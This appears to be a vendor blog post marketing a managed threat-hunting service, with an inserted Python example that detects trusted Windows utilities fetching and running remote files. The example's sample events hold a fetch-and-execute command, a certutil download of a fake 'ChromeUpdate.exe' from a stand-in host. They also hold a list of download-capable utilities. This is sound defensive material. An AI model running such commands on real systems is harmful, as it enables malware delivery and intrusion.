Security alerts and other system and network health indicators don’t always reveal the whole picture of what’s going on in your environment, even when you’re looking for anomalies that can indicate something’s wrong. Proactively searching for threats can help you better prepare for potential issues you wouldn’t see otherwise so you can respond to them before a ransomware attack or data breach takes place. This can save time and resources that might otherwise be spent on incident response, which can in turn enable your team to focus on other important tasks.
Proactive threat hunting is critical for any organization concerned about cybersecurity. However, it requires a working knowledge of threat actor motivations and tactics, and the ability to access dark web activities to get insights into where threat actors are trading data or information on planned attacks. Most importantly, it also requires a mastery of endpoint detection and response tools that enable rich information to be gathered in real time across the network.
Many organizations find it difficult to hire and maintain staff with the skill sets and experience required to successfully run such a program, however. To help any size organization or public safety agency benefit from this capability, Motorola Solutions now offers Managed Threat Hunting via our Advanced Threat Insights (ATI) service. This is a premium offering as part of our Managed Detection and Response (MDR) services.
Advanced Threat Insights Features
Our threat hunters bring advanced expertise to help existing security teams get more focused on the top risks, and enable teams with less experience to get the best insights they can. Our Advanced Threat Insights services include many features, such as:
- Proactive Threat Hunting — We’ll do a weekly deep dive to explore tactics and techniques from threat actors most likely to target your organization. Expert analysts use endpoint detection and response (EDR) tools, ActiveEye security platform event data and network sensor data to look further for signs of potential or successful initial compromise.
- Deep and Dark Web Analysis — Continuous monitoring of dark web data sources for signs of data compromise, such as exposed IP addresses or sensitive information, is a critical feature of ATI and threat hunting. Our analysts look for accounts that may be compromised and domain names that attackers might have set up to establish phishing campaigns against your organization.
- Named Security Analyst — A named analyst focused on your organization’s unique challenges customizes recommendations for your specific environment and the threat actor landscape. Your analyst can answer whatever questions you have on threat actors, potential risks and what they’re seeing in other cyber attacks.
- Monthly Threat Insights Review — A monthly review of findings, threat actor activity and security strategy with your named analyst provides even more information. You can direct the threat hunting focus on different areas as threats and your organization evolve.
The ATI service can be enabled across any of our supported EDR security solutions, including CrowdStrike, VMware Carbon Black, Palo Alto Cortex and Windows Defender Advanced Threat Protection (ATP). It can also be used in any environment with native ActiveEye integrations to our Network Detection sensor, including cloud environments, SaaS applications like Microsoft 365 and public safety infrastructure.
Threat Hunting Methodology
Our investigations are uniquely tailored to identify threats that have a significant likelihood of targeting your organization. A security analyst assesses your risks across different areas of your operations, like particular web applications or cloud infrastructure. They then use this risk model to research threat actors who have previously been identified as using tactics, techniques, and procedures (TTPs) that target those areas.
These TTPs are then translated into queries for your EDR technology and the findings are analyzed by our security team. High risk findings are immediately escalated to your team. Lower risk findings, or those that require more research by our analysts, are reviewed on your monthly call.
Oftentimes, the sudden emergence of a zero-day vulnerability like Log4j can be the focus of a threat hunt to help you remediate a high-risk issue. Threat hunts can also provide additional detection coverage during remediation or patching. In many cases, after the queries have been drafted, our analysts will take the extra step to tune out false positives and transform the query into an ongoing detection. This will trigger an alert on any future activity for our security operations center (SOC) to respond to, thus assisting in vulnerability management.
Use Case: Uncovering Evasive Threats That Bypass EDR
One of our threat hunting engagements focused on discovering evasive techniques used to defeat EDR execution prevention capabilities, based on documented threat actor activity in past incidents the customer had experienced. To put it in simpler terms, we looked for techniques that threat actors were using to bypass endpoint detection solutions in this customer’s environment based on what they’d tried in the past. The threat hunt focused on dozens of techniques for using trusted system utilities to download and execute malicious code, which granted the attacker initial access to a system.
Our analysts uncovered multiple devices that had recently been compromised by a fake update campaign for the Google Chrome browser. Victims were directed to a site misinforming them that their web browser was out of date, prompting them to download and run a trojanized updater file. This malicious file surreptitiously forced compromised computers to mine cryptocurrency — a very resource-heavy activity that slowed down all other operations — without the users knowing it. The file used one of the very techniques our threat hunting was designed to discover. As a result, our security team was able to quarantine these devices and collaborate with the customer to remediate these threats before any sensitive data was put at risk.
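The workflow described under Threat Hunting Methodology (TTP turned into an EDR query, findings triaged into immediate escalation versus monthly review, false positives tuned out) and the fetch-and-execute pattern from the use case above, as an added example that is not ATI's or ActiveEye's own code. It runs over a few constructed process-creation events; the utility list, field names and allowlisted host are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Illustrative set of trusted Windows utilities able to fetch remote content;
# an assumption for this example, to be tuned to the environment being hunted.
DOWNLOAD_CAPABLE_UTILITIES = {"certutil.exe", "bitsadmin.exe", "powershell.exe", "curl.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Constructed process-creation events standing in for EDR telemetry.
EVENTS = [
    {"host": "WS01", "pid": 100, "ppid": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://updates.corp.example/agent.msi agent.msi"},
    {"host": "WS02", "pid": 200, "ppid": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f http://chrome-update.example/ChromeUpdate.exe C:\Users\bob\AppData\Local\Temp\ChromeUpdate.exe"},
    {"host": "WS02", "pid": 201, "ppid": 200, "image": r"C:\Users\bob\AppData\Local\Temp\ChromeUpdate.exe",
     "cmdline": "ChromeUpdate.exe"},
    {"host": "WS03", "pid": 300, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest http://files.example/report.pdf -OutFile report.pdf"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def hunt(events, allowed_hosts):
    """Run the TTP query and triage each hit.

    Returns (host, risk, url) tuples. 'high' = a trusted utility fetched from an
    unsanctioned host AND spawned a child process (fetch-and-execute); 'low' =
    fetch only, held for the monthly review. Hits whose URL host is on the
    allowlist are the tuned-out false positives and are not returned.
    """
    findings = []
    for ev in events:
        if basename(ev["image"]) not in DOWNLOAD_CAPABLE_UTILITIES:
            continue
        match = URL_RE.search(ev["cmdline"])
        if not match:
            continue
        url = match.group(0)
        if (urlparse(url).hostname or "").lower() in allowed_hosts:
            continue  # sanctioned download source: suppressed after tuning
        spawned = any(e["host"] == ev["host"] and e["ppid"] == ev["pid"] for e in events)
        findings.append((ev["host"], "high" if spawned else "low", url))
    return findings

def escalate(findings):
    """Split findings as the methodology describes: high risk now, the rest for the monthly call."""
    return ([f for f in findings if f[1] == "high"], [f for f in findings if f[1] == "low"])

if __name__ == "__main__":
    now, later = escalate(hunt(EVENTS, {"updates.corp.example"}))
    print("escalate now:", now)
    print("monthly review:", later)
```

Once the allowlist has stabilised, the same `hunt` logic is what would be registered as the ongoing SOC detection rather than re-run by hand each week.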
Proactively hunting for cyber threats isn’t just a nice-to-have feature anymore. It can save you time, money and headaches, as well as prevent costly data breaches or ransomware attacks that can shut down your mission-critical systems. With ATI, you get a dedicated security expert to optimize your threat detection and get actionable insights. You can decide how to best use the monthly sync with your named analyst. Some organizations choose to dig deep into the threat hunting queries, while others choose to capture high-level threat trends for agency or board stakeholder discussions and tracking key performance indicators (KPIs). In either case, we find ATI helps refine the organization’s security strategy and justify cybersecurity spend.